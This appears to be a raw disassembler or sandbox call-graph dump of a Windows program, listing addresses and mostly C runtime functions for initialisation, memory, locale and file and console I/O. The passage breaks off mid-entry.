17832->17897 17835 9fb66d 17836 9fb676 17835->17836 17837 9fb680 17835->17837 17838 9fb7e6 ___vcrt_uninitialize_ptd 6 API calls 17836->17838 17837->17778 17839 9fb67b 17838->17839 17840 9fc753 ___vcrt_uninitialize_locks DeleteCriticalSection 17839->17840 17840->17837 17842 9fc720 17841->17842 17844 9fc749 17842->17844 17846 9fb653 17842->17846 17859 9fc954 17842->17859 17845 9fc753 ___vcrt_uninitialize_locks DeleteCriticalSection 17844->17845 17845->17846 17846->17827 17847 9fb7b3 17846->17847 17878 9fc865 17847->17878 17852 9fb7e3 17852->17829 17854 9fb7c8 17854->17829 17856 9fc77d 17855->17856 17857 9fc75e 17855->17857 17856->17827 17858 9fc768 DeleteCriticalSection 17857->17858 17858->17856 17858->17858 17864 9fc81c 17859->17864 17862 9fc98c InitializeCriticalSectionAndSpinCount 17863 9fc977 17862->17863 17863->17842 17865 9fc857 17864->17865 17866 9fc834 17864->17866 17865->17862 17865->17863 17866->17865 17870 9fc782 17866->17870 17869 9fc849 GetProcAddress 17869->17865 17876 9fc78e ___vcrt_FlsFree 17870->17876 17871 9fc802 17871->17865 17871->17869 17872 9fc7a4 LoadLibraryExW 17873 9fc809 17872->17873 17874 9fc7c2 GetLastError 17872->17874 17873->17871 17875 9fc811 FreeLibrary 17873->17875 17874->17876 17875->17871 17876->17871 17876->17872 17877 9fc7e4 LoadLibraryExW 17876->17877 17877->17873 17877->17876 17879 9fc81c ___vcrt_FlsFree 5 API calls 17878->17879 17880 9fc87f 17879->17880 17881 9fc898 TlsAlloc 17880->17881 17882 9fb7bd 17880->17882 17882->17854 17883 9fc916 17882->17883 17884 9fc81c ___vcrt_FlsFree 5 API calls 17883->17884 17885 9fc930 17884->17885 17886 9fc94b TlsSetValue 17885->17886 17887 9fb7d6 17885->17887 17886->17887 17887->17852 17888 9fb7e6 17887->17888 17889 9fb7f6 17888->17889 17890 9fb7f0 17888->17890 17889->17854 17892 9fc8a0 17890->17892 17893 9fc81c ___vcrt_FlsFree 5 API calls 17892->17893 17894 9fc8ba 17893->17894 17895 9fc8c6 17894->17895 17896 9fc8d2 TlsFree 17894->17896 17895->17889 17896->17895 17898 9f8dc9 17897->17898 17899 a0eefb 17897->17899 17898->17776 17898->17835 17899->17898 17902 a05eca 17899->17902 17907 a05f7e 17899->17907 17903 a05ed1 17902->17903 17904 a05f14 GetStdHandle 17903->17904 17905 a05f7a 17903->17905 17906 a05f27 GetFileType 17903->17906 17904->17903 17905->17899 17906->17903 17908 a05f8a CallCatchBlock 17907->17908 17919 9fe1b2 EnterCriticalSection 17908->17919 17910 a05f91 17920 a0c9ab 17910->17920 17913 a05faf 17939 a05fd5 17913->17939 17918 a05eca 2 API calls 17918->17913 17919->17910 17921 a0c9b7 CallCatchBlock 17920->17921 17922 a0c9c0 17921->17922 17923 a0c9e1 17921->17923 17924 9febab __dosmaperr 15 API calls 17922->17924 17942 9fe1b2 EnterCriticalSection 17923->17942 17926 a0c9c5 17924->17926 17927 9fcbcf __strnicoll 26 API calls 17926->17927 17929 a05fa0 17927->17929 17928 a0ca19 17950 a0ca40 17928->17950 17929->17913 17933 a05e14 GetStartupInfoW 17929->17933 17930 a0c9ed 17930->17928 17943 a0c8fb 17930->17943 17934 a05e31 17933->17934 17935 a05ec5 17933->17935 17934->17935 17936 a0c9ab 27 API calls 17934->17936 17935->17918 17937 a05e59 17936->17937 17937->17935 17938 a05e89 GetFileType 17937->17938 17938->17937 17959 9fe1fa LeaveCriticalSection 17939->17959 17941 a05fc0 17941->17899 17942->17930 17944 a04422 __dosmaperr 15 API calls 17943->17944 17949 a0c90d 17944->17949 17945 a0c91a 17946 a0447f _free 15 API calls 17945->17946 17948 a0c96f 17946->17948 17948->17930 17949->17945 17953 a065b4 17949->17953 17958 9fe1fa LeaveCriticalSection 17950->17958 17952 a0ca47 17952->17929 17954 a062a7 std::_Lockit::_Lockit 5 API calls 17953->17954 17955 a065d0 17954->17955 17956 a065ee InitializeCriticalSectionAndSpinCount 17955->17956 17957 a065d9 17955->17957 17956->17957 17957->17949 17958->17952 17959->17941 17961 a0123c 17960->17961 17964 a01252 17960->17964 17961->17964 17966 a0125f 17961->17966 17963 a01249 17963->17964 17979 a013b1 17963->17979 17964->17782 17967 a01268 17966->17967 17968 a0126b 17966->17968 17967->17963 17987 a0c1ea 17968->17987 17975 a0447f _free 15 API calls 17976 a012ac 17975->17976 17976->17963 17977 a0447f _free 15 API calls 17978 a0127d 17977->17978 17978->17975 17980 a01422 17979->17980 17985 a013c0 17979->17985 17980->17964 17981 a04422 __dosmaperr 15 API calls 17981->17985 17982 a01426 17984 a0447f _free 15 API calls 17982->17984 17983 a0b091 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 17983->17985 17984->17980 17985->17980 17985->17981 17985->17982 17985->17983 17986 a0447f _free 15 API calls 17985->17986 17986->17985 17988 a0c1f3 17987->17988 17989 a01272 17987->17989 18022 a0428d 17988->18022 17993 a0c4de GetEnvironmentStringsW 17989->17993 17994 a0c4f5 17993->17994 17995 a0c54b 17993->17995 17998 a0b091 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 17994->17998 17996 a0c554 FreeEnvironmentStringsW 17995->17996 17997 a01277 17995->17997 17996->17997 17997->17978 18005 a012b2 17997->18005 17999 a0c50e 17998->17999 17999->17995 18000 a04e1f __strnicoll 16 API calls 17999->18000 18001 a0c51e 18000->18001 18002 a0c536 18001->18002 18003 a0b091 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18001->18003 18004 a0447f _free 15 API calls 18002->18004 18003->18002 18004->17995 18006 a012c7 18005->18006 18007 a04422 __dosmaperr 15 API calls 18006->18007 18018 a012ee 18007->18018 18008 a01353 18009 a0447f _free 15 API calls 18008->18009 18010 a01288 18009->18010 18010->17977 18011 a04422 __dosmaperr 15 API calls 18011->18018 18012 a01355 18212 a01382 18012->18212 18016 a0447f _free 15 API calls 18016->18008 18017 a01375 18019 9fcbfc __Getctype 11 API calls 18017->18019 18018->18008 18018->18011 18018->18012 18018->18017 18020 a0447f _free 15 API calls 18018->18020 18203 a03503 18018->18203 18021 a01381 18019->18021 18020->18018 18023 a04298 18022->18023 18028 a0429e 18022->18028 18025 a064b8 __dosmaperr 6 API calls 18023->18025 18024 a064f7 __dosmaperr 7 API calls 18027 a042b8 18024->18027 18025->18028 18026 a042a4 18030 a007e9 IsInExceptionSpec 38 API calls 18026->18030 18035 a0431d 18026->18035 18027->18026 18029 a04422 __dosmaperr 15 API calls 18027->18029 18028->18024 18028->18026 18031 a042c8 18029->18031 18032 a04326 18030->18032 18033 a042d0 18031->18033 18034 a042e5 18031->18034 18036 a064f7 __dosmaperr 7 API calls 18033->18036 18037 a064f7 __dosmaperr 7 API calls 18034->18037 18047 a0c036 18035->18047 18038 a042dc 18036->18038 18039 a042f1 18037->18039 18044 a0447f _free 15 API calls 18038->18044 18040 a04304 18039->18040 18041 a042f5 18039->18041 18043 a03ffe __dosmaperr 15 API calls 18040->18043 18042 a064f7 __dosmaperr 7 API calls 18041->18042 18042->18038 18045 a0430f 18043->18045 18044->18026 18046 a0447f _free 15 API calls 18045->18046 18046->18026 18048 a0c14a __strnicoll 38 API calls 18047->18048 18049 a0c049 18048->18049 18066 a0bde0 18049->18066 18052 a0c062 18052->17989 18057 a0447f _free 15 API calls 18059 a0c0b3 18057->18059 18059->17989 18065 a0c0a5 18065->18057 18067 9fd21e __strnicoll 38 API calls 18066->18067 18068 a0bdf2 18067->18068 18069 a0be01 GetOEMCP 18068->18069 18070 a0be13 18068->18070 18071 a0be2a 18069->18071 18070->18071 18072 a0be18 GetACP 18070->18072 18071->18052 18073 a04e1f 18071->18073 18072->18071 18074 a04e5d 18073->18074 18078 a04e2d __dosmaperr 18073->18078 18075 9febab __dosmaperr 15 API calls 18074->18075 18077 a04e5b 18075->18077 18076 a04e48 RtlAllocateHeap 18076->18077 18076->18078 18077->18065 18080 a0c245 18077->18080 18078->18074 18078->18076 18079 a00cac std::ios_base::_Init 2 API calls 18078->18079 18079->18078 18081 a0bde0 40 API calls 18080->18081 18082 a0c265 18081->18082 18083 a0c2db __fread_nolock 18082->18083 18085 a0c29f IsValidCodePage 18082->18085 18085->18083 18204 a03510 18203->18204 18205 a0351e 18203->18205 18204->18205 18208 a03535 18204->18208 18206 9febab __dosmaperr 15 API calls 18205->18206 18211 a03526 18206->18211 18207 9fcbcf __strnicoll 26 API calls 18209 a03530 18207->18209 18208->18209 18210 9febab __dosmaperr 15 API calls 18208->18210 18209->18018 18210->18211 18211->18207 18213 a0138f 18212->18213 18217 a0135b 18212->18217 18214 a013a6 18213->18214 18216 a0447f _free 15 API calls 18213->18216 18215 a0447f _free 15 API calls 18214->18215 18215->18217 18216->18213 18217->18016 18384 9f2cf0 18218->18384 18220 9f2f24 18221 9f2f4d 18220->18221 18389 9f15c0 18220->18389 18222 9f303b std::ios_base::_Init 18221->18222 18224 9f3001 18221->18224 18414 9f1d80 18222->18414 18226 9f3014 GetCurrentProcess FreeConsole 18224->18226 18410 9f3ec0 18224->18410 18231 9f1e20 18226->18231 18228 9f306d 18232 9f4090 std::ios_base::_Init 17 API calls 18231->18232 18233 9f1e7d 18232->18233 18234 9f4090 std::ios_base::_Init 17 API calls 18233->18234 18235 9f1ed0 18234->18235 18236 9f4090 std::ios_base::_Init 17 API calls 18235->18236 18237 9f1f17 18236->18237 18238 9f89cd std::ios_base::_Init 17 API calls 18237->18238 18239 9f1f51 18238->18239 18240 9f89cd std::ios_base::_Init 17 API calls 18239->18240 18241 9f1f9c std::ios_base::_Ios_base_dtor 18240->18241 18242 9f89cd std::ios_base::_Init 17 API calls 18241->18242 18243 9f1ff7 18242->18243 18244 9f89cd std::ios_base::_Init 17 API calls 18243->18244 18358 9f1180 18357->18358 18359 9f2cf0 28 API calls 18358->18359 18360 9f11cd 18359->18360 18361 9f11d2 18360->18361 18884 9f5ef0 18360->18884 18363 9f12fc 18361->18363 18365 9f1334 std::ios_base::_Init 18361->18365 18364 9f130f 18363->18364 18366 9f3ec0 28 API calls 18363->18366 18371 9f1410 18364->18371 18367 9f1d80 std::ios_base::_Init 28 API calls 18365->18367 18366->18364 18368 9f1368 18367->18368 18369 9f98bf Concurrency::cancel_current_task RaiseException 18368->18369 18370 9f1376 18369->18370 18372 9f1430 18371->18372 18949 9f1480 18372->18949 18374 9f143a 18972 9f58d0 18374->18972 18377 9f5510 28 API calls 18385 9f2d07 18384->18385 18386 9f2d1b 18385->18386 18426 9f5510 18385->18426 18386->18220 18438 9f6a1b 18389->18438 18392 9f6a1b std::_Lockit::_Lockit 7 API calls 18394 9f15f1 18392->18394 18393 9f16c8 18395 9f6a73 std::_Lockit::~_Lockit 2 API calls 18393->18395 18444 9f6a73 18394->18444 18396 9f16e1 18395->18396 18396->18221 18397 9f1612 18397->18393 18399 9f166c 18397->18399 18400 9f1657 18397->18400 18451 9f89cd 18399->18451 18401 9f6a73 std::_Lockit::~_Lockit 2 API calls 18400->18401 18403 9f1662 18401->18403 18403->18221 18404 9f16a2 18406 9f16c2 18404->18406 18468 9f2e10 18404->18468 18483 9f6d66 18406->18483 18411 9f3f19 18410->18411 18412 9f3ef4 18410->18412 18411->18226 18412->18411 18721 9f5e80 18412->18721 18415 9f1db3 18414->18415 18415->18415 18733 9f4430 18415->18733 18417 9f1dc7 18743 9f1a10 18417->18743 18419 9f1dfd std::ios_base::_Ios_base_dtor 18419->18228 18420 9f1dd5 18420->18419 18421 9fcbdf std::ios_base::_Init 26 API calls 18420->18421 18422 9f1e1e 18421->18422 18427 9f5524 18426->18427 18431 9f2d37 18426->18431 18428 9f2cf0 28 API calls 18427->18428 18429 9f552e 18428->18429 18430 9f555c 18429->18430 18433 9f558c std::ios_base::_Init 18429->18433 18430->18431 18432 9f3ec0 28 API calls 18430->18432 18431->18220 18432->18431 18434 9f1d80 std::ios_base::_Init 28 API calls 18433->18434 18435 9f55c2 18434->18435 18436 9f98bf Concurrency::cancel_current_task RaiseException 18435->18436 18437 9f55d1 18436->18437 18439 9f6a2a 18438->18439 18440 9f6a31 18438->18440 18486 9fe211 18439->18486 18442 9f15d7 18440->18442 18491 9f85d7 EnterCriticalSection 18440->18491 18442->18392 18442->18397 18445 9fe21f 18444->18445 18446 9f6a7d 18444->18446 18544 9fe1fa LeaveCriticalSection 18445->18544 18448 9f6a90 18446->18448 18543 9f85e5 LeaveCriticalSection 18446->18543 18448->18397 18449 9fe226 18449->18397 18454 9f89d2 18451->18454 18453 9f1673 18453->18404 18459 9f19a0 18453->18459 18454->18453 18455 a00cac std::ios_base::_Init 2 API calls 18454->18455 18456 9f89ee std::ios_base::_Init 18454->18456 18545 9fe228 18454->18545 18455->18454 18457 9f98bf Concurrency::cancel_current_task RaiseException 18456->18457 18458 9f9098 18457->18458 18460 9f6a1b std::_Lockit::_Lockit 7 API calls 18459->18460 18461 9f19aa 18460->18461 18462 9f19f8 18461->18462 18463 9f19e8 18461->18463 18561 9f6be2 18462->18561 18552 9f6e98 18463->18552 18717 9f6ee3 18468->18717 18471 9f2e29 18473 9fcc81 _Yarn 15 API calls 18471->18473 18474 9f2e40 18471->18474 18472 9fcc81 _Yarn 15 API calls 18472->18471 18473->18474 18475 9fcc81 _Yarn 15 API calls 18474->18475 18476 9f2e57 18474->18476 18475->18476 18477 9f2e6e 18476->18477 18478 9fcc81 _Yarn 15 API calls 18476->18478 18478->18477 18484 9f89cd std::ios_base::_Init 17 API calls 18483->18484 18485 9f6d71 18484->18485 18485->18393 18492 a0670f 18486->18492 18491->18442 18513 a060c2 18492->18513 18514 a062a7 std::_Lockit::_Lockit 5 API calls 18513->18514 18515 a060d8 18514->18515 18516 a060dc 18515->18516 18517 a062a7 std::_Lockit::_Lockit 5 API calls 18516->18517 18518 a060f2 18517->18518 18519 a060f6 18518->18519 18520 a062a7 std::_Lockit::_Lockit 5 API calls 18519->18520 18521 a0610c 18520->18521 18522 a06110 18521->18522 18523 a062a7 std::_Lockit::_Lockit 5 API calls 18522->18523 18543->18448 18544->18449 18551 a04e1f __dosmaperr 18545->18551 18546 a04e5d 18547 9febab __dosmaperr 15 API calls 18546->18547 18549 a04e5b 18547->18549 18548 a04e48 RtlAllocateHeap 18548->18549 18548->18551 18549->18454 18550 a00cac std::ios_base::_Init 2 API calls 18550->18551 18551->18546 18551->18548 18551->18550 18566 9fe488 18552->18566 18703 9f6b39 18561->18703 18567 a0670f std::_Lockit::_Lockit 5 API calls 18566->18567 18568 9fe495 18567->18568 18706 9f1cf0 18703->18706 18709 9f983d 18706->18709 18718 9f6eef 18717->18718 18719 9f2e19 18717->18719 18720 9fe488 std::_Locinfo::_Locinfo_ctor 66 API calls 18718->18720 18719->18471 18719->18472 18720->18719 18724 9f4540 18721->18724 18723 9f5e9e 18723->18411 18725 9f455d 18724->18725 18726 9f4554 18724->18726 18725->18723 18727 9f98bf Concurrency::cancel_current_task RaiseException 18726->18727 18728 9f456c std::ios_base::_Init 18726->18728 18727->18728 18729 9f1d80 std::ios_base::_Init 28 API calls 18728->18729 18730 9f45a3 18729->18730 18731 9f98bf Concurrency::cancel_current_task RaiseException 18730->18731 18732 9f45b2 18731->18732 18732->18723 18736 9f4441 _Yarn 18733->18736 18737 9f4468 18733->18737 18734 9f450d 18765 9f4070 18734->18765 18736->18417 18737->18734 18757 9f4090 18737->18757 18740 9f44f1 std::ios_base::_Ios_base_dtor 18740->18417 18741 9f44b1 _Yarn 18741->18740 18742 9fcbdf std::ios_base::_Init 26 API calls 18741->18742 18742->18734 18744 9f1a26 18743->18744 18745 9f4090 std::ios_base::_Init 17 API calls 18744->18745 18746 9f1a2d _Yarn 18744->18746 18745->18746 18747 9f1af2 std::ios_base::_Ios_base_dtor 18746->18747 18749 9f1ba2 18746->18749 18748 9f983d std::bad_exception::bad_exception 27 API calls 18747->18748 18752 9f1b47 18748->18752 18750 9fcbdf std::ios_base::_Init 26 API calls 18749->18750 18750->18752 18751 9f1b78 std::ios_base::_Ios_base_dtor 18751->18420 18752->18751 18753 9fcbdf std::ios_base::_Init 26 API calls 18752->18753 18754 9f1bac 18753->18754 18755 9f983d std::bad_exception::bad_exception 27 API calls 18754->18755 18756 9f1bd2 18755->18756 18756->18420 18758 9f40bd 18757->18758 18759 9f409b 18757->18759 18761 9f40cd 18758->18761 18763 9f89cd std::ios_base::_Init 17 API calls 18758->18763 18759->18758 18760 9f40d2 18759->18760 18768 9f4030 18760->18768 18761->18741 18764 9f40c7 18763->18764 18764->18741 18772 9f6ba2 18765->18772 18769 9f403b std::ios_base::_Init 18768->18769 18770 9f98bf Concurrency::cancel_current_task RaiseException 18769->18770 18771 9f404a 18770->18771 18777 9f6ac5 18772->18777 18775 9f98bf Concurrency::cancel_current_task RaiseException 18776 9f6bc1 18775->18776 18778 9f1cf0 std::invalid_argument::invalid_argument 27 API calls 18777->18778 18779 9f6ad7 18778->18779 18779->18775 18887 9f83d9 18884->18887 18885 9f5f03 18885->18361 18888 9f83e8 18887->18888 18890 9f83fb _Yarn 18887->18890 18888->18885 18890->18888 18891 9ffcb7 18890->18891 18892 9ffcc5 18891->18892 18893 9ffce2 18891->18893 18892->18893 18894 9ffce6 18892->18894 18895 9ffcd2 18892->18895 18893->18888 18901 9ffa98 18894->18901 18897 9febab __dosmaperr 15 API calls 18895->18897 18899 9ffcd7 18897->18899 18900 9fcbcf __strnicoll 26 API calls 18899->18900 18900->18893 18902 9ffaa4 CallCatchBlock 18901->18902 18909 9fed28 EnterCriticalSection 18902->18909 18904 9ffab2 18910 9ffaf3 18904->18910 18909->18904 18920 a05d2e 18910->18920 18921 a05cf3 26 API calls 18920->18921 18923 a05d3f 18921->18923 18922 9ffb07 18927 9ffb36 18922->18927 18923->18922 18924 a04e1f __strnicoll 16 API calls 18923->18924 18925 a05d99 18924->18925 18926 a0447f _free 15 API calls 18925->18926 18926->18922 18930 9ffb48 18927->18930 18933 9ffb22 18927->18933 18928 9ffb56 18929 9febab __dosmaperr 15 API calls 18928->18929 18930->18928 18930->18933 18936 9ffb7e _Yarn _Fputc 18930->18936 18938 a05dda 18933->18938 18935 a05cb7 _Fputc 26 API calls 18935->18936 18936->18933 18936->18935 18937 a08019 ___scrt_uninitialize_crt 63 API calls 18936->18937 18942 9ff088 18936->18942 18937->18936 18950 9f6a1b std::_Lockit::_Lockit 7 API calls 18949->18950 18951 9f1497 18950->18951 18952 9f6a1b std::_Lockit::_Lockit 7 API calls 18951->18952 18958 9f14d2 18951->18958 18954 9f14b1 18952->18954 18953 9f159c 18955 9f6a73 std::_Lockit::~_Lockit 2 API calls 18953->18955 18956 9f6a73 std::_Lockit::~_Lockit 2 API calls 18954->18956 18957 9f15b5 18955->18957 18956->18958 18957->18374 18958->18953 18959 9f152c 18958->18959 18960 9f1517 18958->18960 18962 9f89cd std::ios_base::_Init 17 API calls 18959->18962 18961 9f6a73 std::_Lockit::~_Lockit 2 API calls 18960->18961 18963 9f1522 18961->18963 18966 9f1533 18962->18966 18963->18374 18964 9f1575 18965 9f1596 18964->18965 18967 9f2e10 codecvt 66 API calls 18964->18967 18968 9f6d66 std::_Facet_Register 17 API calls 18965->18968 18966->18964 18969 9f19a0 codecvt 69 API calls 18966->18969 18967->18965 18968->18953 18970 9f1562 18969->18970 18983 9f6fad 18970->18983 18973 9f2cf0 28 API calls 18972->18973 18974 9f5904 18973->18974 18975 9f598e 18974->18975 18977 9f59c8 std::ios_base::_Init 18974->18977 18976 9f146e 18975->18976 18978 9f3ec0 28 API calls 18975->18978 18976->18377 18979 9f1d80 std::ios_base::_Init 28 API calls 18977->18979 18978->18976 18980 9f59fa 18979->18980 18995 9fe604 18983->18995 18996 a041d0 __Getctype 38 API calls 18995->18996 18997 9fe60f 18996->18997 18998 a0514e __Getctype 38 API calls 18997->18998 19099 9f19a0 19100 9f6a1b std::_Lockit::_Lockit 7 API calls 19099->19100 19101 9f19aa 19100->19101 19102 9f19f8 19101->19102 19103 9f19e8 19101->19103 19105 9f6be2 codecvt 28 API calls 19102->19105 19104 9f6e98 std::_Locinfo::_Locinfo_ctor 67 API calls 19103->19104 19106 9f19ef 19104->19106 19107 9f1a02 19105->19107 20500 a0eee2 20501 a0eefb 20500->20501 20502 a0ef19 20500->20502 20501->20502 20503 a05eca 2 API calls 20501->20503 20504 a05f7e 31 API calls 20501->20504 20503->20501 20504->20501 20567 a082e5 20568 a082f2 20567->20568 20572 a0830a 20567->20572 20569 9febab __dosmaperr 15 API calls 20568->20569 20570 a082f7 20569->20570 20571 9fcbcf __strnicoll 26 API calls 20570->20571 20581 a08302 20571->20581 20573 a08369 20572->20573 20575 a09804 15 API calls 20572->20575 20572->20581 20574 a05cb7 _Fputc 26 API calls 20573->20574 20576 a08381 20574->20576 20575->20573 20587 a09182 20576->20587 20579 a05cb7 _Fputc 26 API calls 20580 a083b5 20579->20580 20580->20581 20582 a05cb7 _Fputc 26 API calls 20580->20582 20583 a083c3 20582->20583 20583->20581 20584 a05cb7 _Fputc 26 API calls 20583->20584 20585 a083d3 20584->20585 20586 a05cb7 _Fputc 26 API calls 20585->20586 20586->20581 20588 a0918e CallCatchBlock 20587->20588 20589 a09196 20588->20589 20590 a091ae 20588->20590 20591 9feb98 __dosmaperr 15 API calls 20589->20591 20592 a0926b 20590->20592 20597 a091e4 20590->20597 20594 a0919b 20591->20594 20593 9feb98 __dosmaperr 15 API calls 20592->20593 20595 a09270 20593->20595 20596 9febab __dosmaperr 15 API calls 20594->20596 20598 9febab __dosmaperr 15 API calls 20595->20598 20599 a08388 20596->20599 20600 a09202 20597->20600 20601 a091ed 20597->20601 20610 a091fa 20598->20610 20599->20579 20599->20581 20617 a0ca49 EnterCriticalSection 20600->20617 20603 9feb98 __dosmaperr 15 API calls 20601->20603 20605 a091f2 20603->20605 20604 a09208 20606 a09224 20604->20606 20607 a09239 20604->20607 20609 9febab __dosmaperr 15 API calls 20605->20609 20611 9febab __dosmaperr 15 API calls 20606->20611 20618 a09296 20607->20618 20608 9fcbcf __strnicoll 26 API calls 20608->20599 20609->20610 20610->20608 20613 a09229 20611->20613 20615 9feb98 __dosmaperr 15 API calls 20613->20615 20614 a09234 20681 a09263 20614->20681 20615->20614 20617->20604 20619 a092c0 20618->20619 20620 a092a8 20618->20620 20622 a09627 20619->20622 20627 a09300 20619->20627 20621 9feb98 __dosmaperr 15 API calls 20620->20621 20623 a092ad 20621->20623 20624 9feb98 __dosmaperr 15 API calls 20622->20624 20625 9febab __dosmaperr 15 API calls 20623->20625 20626 a0962c 20624->20626 20628 a092b5 20625->20628 20629 9febab __dosmaperr 15 API calls 20626->20629 20627->20628 20630 a0930b 20627->20630 20634 a0933a 20627->20634 20628->20614 20631 a09318 20629->20631 20632 9feb98 __dosmaperr 15 API calls 20630->20632 20635 9fcbcf __strnicoll 26 API calls 20631->20635 20633 a09310 20632->20633 20636 9febab __dosmaperr 15 API calls 20633->20636 20637 a09353 20634->20637 20638 a093aa 20634->20638 20639 a0936e 20634->20639 20635->20628 20636->20631 20637->20639 20673 a09358 20637->20673 20641 a04e1f __strnicoll 16 API calls 20638->20641 20640 9feb98 __dosmaperr 15 API calls 20639->20640 20642 a09373 20640->20642 20643 a093c1 20641->20643 20644 9febab __dosmaperr 15 API calls 20642->20644 20646 a0447f _free 15 API calls 20643->20646 20647 a0937a 20644->20647 20645 a10d41 __fread_nolock 26 API calls 20648 a09501 20645->20648 20649 a093ca 20646->20649 20650 9fcbcf __strnicoll 26 API calls 20647->20650 20651 a09577 20648->20651 20654 a0951a GetConsoleMode 20648->20654 20652 a0447f _free 15 API calls 20649->20652 20680 a09385 __fread_nolock 20650->20680 20653 a0957b ReadFile 20651->20653 20655 a093d1 20652->20655 20656 a09595 20653->20656 20657 a095ef GetLastError 20653->20657 20654->20651 20658 a0952b 20654->20658 20659 a093f6 20655->20659 20660 a093db 20655->20660 20656->20657 20663 a0956c 20656->20663 20661 a09553 20657->20661 20662 a095fc 20657->20662 20658->20653 20664 a09531 ReadConsoleW 20658->20664 20669 a097e9 __fread_nolock 28 API calls 20659->20669 20667 9febab __dosmaperr 15 API calls 20660->20667 20670 9feb75 __dosmaperr 15 API calls 20661->20670 20661->20680 20668 9febab __dosmaperr 15 API calls 20662->20668 20676 a095d1 20663->20676 20677 a095ba 20663->20677 20663->20680 20664->20663 20665 a0954d GetLastError 20664->20665 20665->20661 20666 a0447f _free 15 API calls 20666->20628 20671 a093e0 20667->20671 20672 a09601 20668->20672 20669->20673 20670->20680 20674 9feb98 __dosmaperr 15 API calls 20671->20674 20675 9feb98 __dosmaperr 15 API calls 20672->20675 20673->20645 20674->20680 20675->20680 20676->20680 20697 a08e01 20676->20697 20684 a08fb0 20677->20684 20680->20666 20707 a0ca6c LeaveCriticalSection 20681->20707 20683 a09269 20683->20599 20702 a08cad 20684->20702 20686 a0b015 __fassign MultiByteToWideChar 20687 a090c4 20686->20687 20691 a090cd GetLastError 20687->20691 20694 a08ff8 20687->20694 20688 a09052 20695 a097e9 __fread_nolock 28 API calls 20688->20695 20696 a0900c 20688->20696 20689 a09042 20692 9febab __dosmaperr 15 API calls 20689->20692 20693 9feb75 __dosmaperr 15 API calls 20691->20693 20692->20694 20693->20694 20694->20680 20695->20696 20696->20686 20700 a08e3b 20697->20700 20698 a08f7f 20698->20680 20699 a08eb8 ReadFile 20699->20700 20700->20698 20700->20699 20701 a097e9 __fread_nolock 28 API calls 20700->20701 20701->20700 20703 a08ce1 20702->20703 20704 a08dd8 20703->20704 20705 a08d48 ReadFile 20703->20705 20706 a097e9 __fread_nolock 28 API calls 20703->20706 20704->20688 20704->20689 20704->20694 20704->20696 20705->20703 20706->20703 20707->20683 20715 9f7cd5 20716 9f7ce8 20715->20716 20718 9f7cfc 20716->20718 20719 9fffc1 20716->20719 20720 9fffcd CallCatchBlock 20719->20720 20721 9fffe9 20720->20721 20722 9fffd4 20720->20722 20732 9fed28 EnterCriticalSection 20721->20732 20724 9febab __dosmaperr 15 API calls 20722->20724 20726 9fffd9 20724->20726 20725 9ffff3 20733 9ffec7 20725->20733 20728 9fcbcf __strnicoll 26 API calls 20726->20728 20730 9fffe4 20728->20730 20730->20718 20732->20725 20734 9ffedf 20733->20734 20741 9fff4f 20733->20741 20735 a05cb7 _Fputc 26 API calls 20734->20735 20738 9ffee5 20735->20738 20736 a09804 15 API calls 20740 9fff47 20736->20740 20737 9fff37 20739 9febab __dosmaperr 15 API calls 20737->20739 20738->20737 20738->20741 20742 9fff3c 20739->20742 20744 a0002c 20740->20744 20741->20736 20741->20740 20743 9fcbcf __strnicoll 26 API calls 20742->20743 20743->20740 20747 9fed3c LeaveCriticalSection 20744->20747 20746 a00032 20746->20730 20747->20746 21989 9f7f1e 21990 9f7f2a 21989->21990 21991 9f7f61 21990->21991 21995 9ffe45 21990->21995 21993 9f7f4e 21993->21991 21994 9f78d9 26 API calls 21993->21994 21994->21991 21996 9ffe57 21995->21996 21998 9ffe6c 21995->21998 21997 9febab __dosmaperr 15 API calls 21996->21997 21999 9ffe5c 21997->21999 21998->21996 22001 9ffe93 21998->22001 22000 9fcbcf __strnicoll 26 API calls 21999->22000 22003 9ffe67 22000->22003 22005 9ffd1a 22001->22005 22003->21993 22006 9ffd26 CallCatchBlock 22005->22006 22013 9fed28 EnterCriticalSection 22006->22013 22008 9ffd34 22014 9ffd75 22008->22014 22010 9ffd41 22023 9ffd69 22010->22023 22013->22008 22015 9ff088 ___scrt_uninitialize_crt 63 API calls 22014->22015 22016 9ffd8d 22015->22016 22017 a0754f 15 API calls 22016->22017 22018 9ffd97 22017->22018 22019 a04422 __dosmaperr 15 API calls 22018->22019 22022 9ffdb1 22018->22022 22020 9ffdd6 22019->22020 22021 a0447f _free 15 API calls 22020->22021 22021->22022 22022->22010 22026 9fed3c LeaveCriticalSection 22023->22026 22025 9ffd52 22025->21993 22026->22025 20926 9f820d 20928 9f821f _Yarn 20926->20928 20927 9f8225 20928->20927 20929 9f82d1 20928->20929 20932 9ff64b 20928->20932 20929->20927 20931 9ff64b __fread_nolock 40 API calls 20929->20931 20931->20927 20935 9ff668 20932->20935 20936 9ff674 CallCatchBlock 20935->20936 20937 9ff663 20936->20937 20938 9ff6be 20936->20938 20939 9ff687 __fread_nolock 20936->20939 20937->20928 20948 9fed28 EnterCriticalSection 20938->20948 20942 9febab __dosmaperr 15 API calls 20939->20942 20941 9ff6c8 20949 9ff465 20941->20949 20944 9ff6a1 20942->20944 20946 9fcbcf __strnicoll 26 API calls 20944->20946 20946->20937 20948->20941 20953 9ff476 __fread_nolock 20949->20953 20961 9ff492 20949->20961 20950 9ff482 20951 9febab __dosmaperr 15 API calls 20950->20951 20952 9ff487 20951->20952 20954 9fcbcf __strnicoll 26 API calls 20952->20954 20953->20950 20958 9ff4d4 __fread_nolock 20953->20958 20953->20961 20954->20961 20955 9ff5fb __fread_nolock 20959 9febab __dosmaperr 15 API calls 20955->20959 20956 a05cb7 _Fputc 26 API calls 20956->20958 20957 9ff705 __fread_nolock 26 API calls 20957->20958 20958->20955 20958->20956 20958->20957 20960 a09296 __fread_nolock 38 API calls 20958->20960 20958->20961 20959->20952 20960->20958 20962 9ff6fd 20961->20962 20965 9fed3c LeaveCriticalSection 20962->20965 20964 9ff703 20964->20937 20965->20964 20973 a01c35 20976 a01901 20973->20976 20977 a0190d CallCatchBlock 20976->20977 20984 9fe1b2 EnterCriticalSection 20977->20984 20979 a01945 20985 a01963 20979->20985 20980 a01917 20980->20979 20982 a0dbc1 __Getctype 15 API calls 20980->20982 20982->20980 20984->20980 20988 9fe1fa LeaveCriticalSection 20985->20988 20987 a01951 20988->20987 21159 9f7a2b 21160 9f7a7e 21159->21160 21161 9f7a32 21159->21161 21164 